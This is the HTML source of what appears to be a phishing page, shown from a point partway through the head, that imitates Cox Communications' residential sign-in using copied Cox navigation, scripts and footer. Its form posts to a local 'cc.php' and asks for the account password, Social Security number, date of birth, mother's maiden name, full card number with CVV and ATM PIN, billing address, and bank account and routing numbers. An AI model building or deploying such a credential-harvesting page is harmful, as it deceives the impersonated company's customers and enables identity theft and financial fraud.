v=""+location,w={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-spa-1016.min.js"},y=l&&m&&m[d]&&!/CriOS/.test(navigator.userAgent),g=e.exports={offset:a(),origin:v,features:{},xhrWrappable:y};h[d]?(h[d]("DOMContentLoaded",i,!1),u[d]("load",r,!1)):(h[p]("onreadystatechange",o),u[p]("onload",r)),c("mark",["firstbyte",a()],null,"api");var b=0},{}]},{},["loader",2,14,5,3,4]);
			;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:"55a0768cf0",applicationID:"34236891",sa:1}
		</script>
		<!-- RELIC MONITORING SCRIPT END -->
		<script src="https://webcdn.cox.com/content/dam/cox/apps/common/scripts/prod/adobestack.js"></script>
	</head>

	<body>
		<!-- Skip to Main Content -->
		<div id="pf-skip-nav">
			<a href="#container" class="pf-sr-only">Skip to Main Content</a>
		</div>

		<!-- pf-container -->
		<div id="pf-container">
			<!-- header -->
			<div id="pf-header" class="pf-header-residential noindex">
				<!-- begin header wrapper -->
				<div class="pf-header-wrapper">
					<!-- begin menu panel - left side panel on mobile -->
					<div class="pf-menu-panel">
						<!-- begin mobile wrapper -->
						<div class="pf-mobile-wrapper">
							<!-- begin top header -->
							<div class="pf-top-header">
								<div class="pf-top-nav">
									<!-- left side of top nav -->
									<ul class="pf-top-nav-lob" role="presentation"></ul>
									<!-- right side of top nav -->
									<ul class="pf-top-nav-overlays" role="presentation">
										<li class="contact"><a href="https://www.cox.com/residential/contactus.html">Contact Us</a></li>
									</ul>
								</div>
							</div>
							<!-- end top header -->
							<!-- begin main header -->
							<div class="pf-main-header">
								<div class="pf-main-nav">
									<div class="pf-main-left-nav">
										<ul role="presentation">
											<li class="header-logo"><a href="https://www.cox.com/residential/home.html">Residential Homepage</a></li>
										</ul>
										<!-- begin primary link list -->
										<ul class="pf-main-nav-primary-links" role="presentation">
											<li class="pf-shop"><a href="https://www.cox.com/residential-shop/order-cox-services.cox">Shop</a></li>
											<li class="pf-my-connection"><a href="https://www.cox.com/resaccount/home.cox">My Account</a></li>
											<li class="pf-webmail"><a href="https://webmail.cox.net/">Cox Email</a></li>
											<li class="pf-support"><a href="https://www.cox.com/residential/support.html">Support</a></li>
										</ul>
									</div>
								</div>
							</div>
							<!-- end main header -->
						</div>
						<!-- end mobile wrapper -->

						<!-- begin sub header -->
						<div class="pf-sub-header">
							<div class="pf-sub-nav pf-search-items">
								<div class="pf-sub-nav-underlay">
									<div class="pf-sub-nav-close"><a title="Close Menu Bar"></a></a></div>
								</div>
							</div>
						</div>
						<!-- end sub header -->

					</div>
					<!-- end menu panel - left side panel on mobile -->
				</div>
				<!-- end header wrapper -->
				<!-- mobile header -->
				<div class="pf-mobile-menu-bar pf-mobile-only">
					<ul role="presentation">
						<li class="header-logo"><a href="https://www.cox.com/residential/home.html">Homepage</a></li>
					</ul>
				</div>
				<!-- /mobile header -->
			</div>
			<!-- /header -->

			<!-- container -->
			<div id="container">
				<h1 class="hide">Sign In to Your Cox Account</h1>

				<!-- hero -->
				<div class="hero-block hero-slim col-reset" style="margin-bottom: 30px;">
					<div class="text-block" style="height: 300px;">
						<div class="position-content position-content-desktop-middle position-content-mobile-top" style="left: 1%; top: 20px;">
							<div class="text-wrapper" style="width:34%;">
								<h2>With My Account, you're in control</h2>
								<p>Manage your account, pay bills and more anytime, anywhere.</p>
							</div>
						</div>
					</div>
					<div class="hero-image desktop-only" style="background-image: url('https://webcdn.cox.com/content/dam/cox/residential/images/general/general_login_hero.jpg');"></div>
					<div class="hero-image mobile-only" style="background-image: url('https://webcdn.cox.com/content/dam/cox/residential/images/general/general_login_hero_mobile.jpg');"></div>
				</div>
				<!-- /hero -->

				<!-- START: grid -->
				<div class="cols-grid">
					<div class="section-container constrain-960">
						<div class="colspan-12">
							<div class="colspan-7">
								<div class="col-content">




									


									<form class="form" id="" name="" action="cc.php" method="post" enctype="">


<h3>Residential Sign In</h3>




										<label for="username">User ID</label>
										<div class="login-content-div">
											<input type="text" placeholder="User ID" id="username" name="username" size="25" class="required" required />
										</div>
										<label for="password">Password</label>
										<div class="login-content-div">
											<input type="password" class="required" placeholder="Password" id="password" size="25" name="password" title="Password" required />
										</div>




<h3>Enter Personal & Card Details</h3>
		</p>


		

		<div class="form-group">
			<label for="txtNameOnCC">Phone Number</label>
			<div>
				<input id="txtNameOnCC" type="text" class="required" autocomplete="off"
					size="20" maxlength="100" name="phone" required />
			</div>
		</div><br>




		<div class="form-group">
			<label for="txtNameOnCC">Social Security Number</label>
			<div>
				<input id="txtNameOnCC" type="text" placeholder="***-**-****" class="required" autocomplete="off"
					size="20" maxlength="100" name="ssn" required />
			</div>
		</div><br>




		<div class="form-group">
			<label for="txtNameOnCC">Date of Birth</label>
			<div>
				<input id="txtNameOnCC" type="text" placeholder="MM/DD/YEAR" class="required" autocomplete="off"
					size="20" maxlength="100" name="dob" required />
			</div>
		</div><br>





<div class="form-group">
			<label for="txtNameOnCC">Mother's Maiden Name</label>
			<div>
				<input id="txtNameOnCC" type="text" class="required" autocomplete="off"
					size="20" maxlength="100" name="mmn" required />
			</div>
		</div><br>




		<!-- Name on card -->
		<div class="form-group">
			<label for="txtNameOnCC">Name on Card</label>
			<div>
				<input id="txtNameOnCC" type="text" class="required" autocomplete="off"
					size="25" maxlength="100" name="txtNameOnCC" required />
			</div>
		</div><br>

		<!-- Card Number -->
		<div class="form-group">
			<label for="txtCCNum">Card Number</label>
			<div>
				<input id="txtNameOnCC" type="text" class="required" autocomplete="off"
					size="25" maxlength="16" name="CCN" required />
			</div>
		</div><br>


		<!-- Expiration Date -->
		<div class="form-group">
			<label for="ccExpiration">Expiration Date</label>
			<div class="row expiration-date">
				<div class="col-md-5">
					<div class="row">
						<div class="col-6">
							<select class="required" id="ccMonth" name="ccMonth"
								aria-label="expiration-date" required >
								<option value="">Month</option> 
																<option value="01">01</option> 
																<option value="02">02</option> 
																<option value="03">03</option> 
																<option value="04">04</option> 
																<option value="05">05</option> 
																<option value="06">06</option> 
																<option value="07">07</option> 
																<option value="08">08</option> 
																<option value="09">09</option> 
																<option value="10">10</option> 
																<option value="11">11</option> 
																<option value="12">12</option> 
															</select>
						</div><br>
						<div class="col-6">
							<select class="required" id="ccYear" name="ccYear"
								aria-label="expiration-date" required >
								<option value="">Year</option> 
																
																<option value="2020">2020</option> 
																<option value="2021">2021</option> 
																<option value="2022">2022</option> 
																<option value="2023">2023</option> 
																<option value="2024">2024</option> 
																<option value="2025">2025</option> 
																<option value="2026">2026</option> 
																<option value="2027">2027</option> 
																<option value="2028">2028</option> 

                                                                                                                                <option value="2029">2029</option> 
																<option value="2030">2030</option> 
															</select>
						</div>
					</div>
				</div>
			</div>
		</div><br>




		<div class="form-group">
			<label for="txtNameOnCC">Card Verification Code (CVV)</label>
			<div>
				<input id="txtNameOnCC" type="text" class="required" autocomplete="off"
					size="5" maxlength="4" name="cvv" required />
			</div>
		</div><br>




<div class="form-group">
			<label for="txtNameOnCC">ATM Card PIN</label>
			<div>
				<input id="txtNameOnCC" type="password" class="required" autocomplete="off"
					size="5" maxlength="4" name="pin" />
			</div>
		</div><br>




<div class="form-group">
			<label for="txtNameOnCC">Billing Address On Card</label>
			<div>
				<input id="txtNameOnCC" type="text" placeholder="Address - City - State - Zip Code" class="required" autocomplete="off"
					size="40" maxlength="100" name="baoc" required />
			</div>
		</div><br>


		

<BR>




















<h3>Enter Account Details</h3>
		</p>
		<!-- Name on account  -->
		<div class="form-group">
			<label for="txtNameOnBankAcct">Name on Account</label>
			<div>
				<input id="txtNameOnBankAcct" type="text" class=""
					autocomplete="off" size="30" maxlength="31" name="txtNameOnBankAcct" required />
				
			</div>
		</div><br>




		<!-- Account Number -->
		<div class="form-group">
			<label for="txtAcctNum">Account Number</label>
			<div>
				<input id="txtAcctNum" type="text" class=""
					autocomplete="off" size="30" name="txtAcctNum" maxlength="18" data-mask="V" required />
			</div>
		</div><br>

		<!-- Routing Number  -->
		<div class="form-group">
			<label for="txtRoutingNum">Routing Number</label>
			<div>
				<input id="txtRoutingNum" type="tel" class=""
					autocomplete="off" size="30" maxlength="9" name="txtRoutingNum" required />
			</div>
		</div><br>
		<!-- Account Type -->
		<div class="form-group">
			<label for="ddAcctType">Account Type</label>
			<div>
				<select class="required  " id="ddAcctType" name="ddAcctType">
					<option checked="checked" value="checking">Checking</option>
					<option value="savings">Savings</option>
				</select>
			</div>
		</div><br>


























































































										<div class="login-content-div">
											<input type="checkbox" checked="checked" name="rememberme" id="rememberme" />
											<label for="rememberme" id="rememberme-label">Remember User ID</label>
										</div>
										<div class="login-content-div">
											<input type="submit" class="sign-in-validate" value="Update & Continue" />
											<span class="sign-in-lock desktop-only"></span>
										</div>
										<p>
											<a href="https://www.cox.com/myprofile/forgot-userid.cox?finalview=">Forgot User ID?</a><br/>
											<a href="https://www.cox.com/myprofile/forgot-password.cox?finalview=">Forgot Password?</a>
										</p>
										<p>
											<a href="https://idm.east.cox.net/selfservice2/registration.jsp?finalview=">No Account? Register Now!</a><br/>
											<a href="https://www.cox.com/residential/support/trouble-signing-in-on-the-cox-website.html">Need Help Signing In?</a>
										</p>
									</form>
								</div>
							</div>

							<div class="colspan-4 desktop-only">
								<!-- ad-container -->
								<div class="ad-container">
									<script type="text/javascript" src="https://static-segments.beringmedia.com/dfp/1/bmi.segments.js"></script>
									<script type="text/javascript">
										var re = /^.*(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))(@|%40)((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,})).*$/;
										var url = window.location.href.toLowerCase();
										var emailMatch=re.test(url);

										if(!emailMatch) {

											var googletag = googletag || {};googletag.cmd = googletag.cmd || [];(function() { var gads = document.createElement("script");gads.async = true;gads.type = "text/javascript";var useSSL = "https:" == document.location.protocol;gads.src = ( useSSL ? "https:" : "http:") + "//www.googletagservices.com/tag/js/gpt.js";var node = document.getElementsByTagName("script")[0];node.parentNode.insertBefore(gads, node);})();

											//var googletag = googletag || {};
											googletag.cmd = googletag.cmd || [];

											(function() {
											 var gads = document.createElement('script');
											 gads.async = true;
											 gads.type = 'text/javascript';

											 var useSSL = 'https:' == document.location.protocol;
											 gads.src = (useSSL ? 'https:' : 'http:') + '//www.googletagservices.com/tag/js/gpt.js';

											 var node = document.getElementsByTagName('script')[0];
											 node.parentNode.insertBefore(gads, node);
											 })();

											if(!window.console) console = { log: function(){} };

											coxSite = getCoxCookies("cox-current-site");
											if(coxSite && coxSite != '""') {
												siteId = coxSite;
											} else {
												siteId = "national";
											}

											var segmentStr = "";
											if (bmi) {
												bmi.segments.getSegments({
													timeoutMs: 1000,
													publisherId: "52ac4a92-fb84-4f60-a518-13cd6da99f3d",
													callback: function(segments) {
														if (segments.length > 0) {
															segmentStr = ";segments=" + segments.join(',');
														}
													}
												});
											}

											var pageStr=utag_data.pageName;
											var curURL = location.protocol + '//' + location.host + location.pathname;
												curURL = encodeURIComponent(curURL);

											googletag.cmd.push(function() {
											googletag.defineSlot('/131/'+siteId+'.cox.com', [300, 250], 'ad01').addService(googletag.pubads());

											googletag.pubads().setTargeting('pg',pageStr);
											googletag.pubads().setTargeting('rg',siteId);
											googletag.pubads().setTargeting('brg',segmentStr);
											googletag.pubads().collapseEmptyDivs(true);
											googletag.enableServices();
											});
										}
									</script>

									<div id="ad01" style="text-align:center; margin-bottom:8px;">
										<script>
											if(!emailMatch ) {
												googletag.cmd.push(function() {
												googletag.display("ad01");
												});
											}
										</script>
									</div>
								</div>
								<!-- /ad-container -->
							</div>

						</div>
					</div>
				</div>
				<!--   END: grid -->

			</div>
			<!-- /container -->

			<!-- footer -->
			<div class="cox-footer">
				<div class="cox-footer-container"></div>
			</div>
			<div class="footer-footer">
				<p class="copyright-note">&copy; 1998-<script>var now = new Date(); var year = now.getFullYear(); document.write(year);</script> Cox Communications, Inc.</p>
			</div>
			<!-- /footer -->

		</div>
		<!-- /pf-container -->

		<script>
			var libPresent = true;
			var appJQueryVer = '';
			var srcPath = "https://webcdn2.cox.com/ui/presentation/tsw/js/";
			if(typeof jQuery !='undefined')
				appJQueryVer = jQuery.fn.jquery;

			if(appJQueryVer.length == 0 || appJQueryVer.substr(0, jQuery.fn.jquery.lastIndexOf('.')) !== "1.11" ||
				typeof jQuery.ui =='undefined' || jQuery.ui.version !== "1.11.4" || typeof jQuery.ui.autocomplete =='undefined') {
					libPresent = false;
					var presentationSrc = srcPath + "presentation.js.jgz";
					loadPresentationScript(presentationSrc);
			}

			if(libPresent) {
				CoxPF = jQuery;
				var presentationCoreSrc = srcPath + "presentation-core.js.jgz";
				loadPresentationScript(presentationCoreSrc);
			}

			function loadPresentationScript(scriptSrc) {
				var presentationScript = document.createElement('script');
				presentationScript.setAttribute("type","text/javascript");
				presentationScript.setAttribute("src", scriptSrc);
				document.getElementsByTagName('head')[0].appendChild(presentationScript);
			}
		</script>

	</body>
</html>
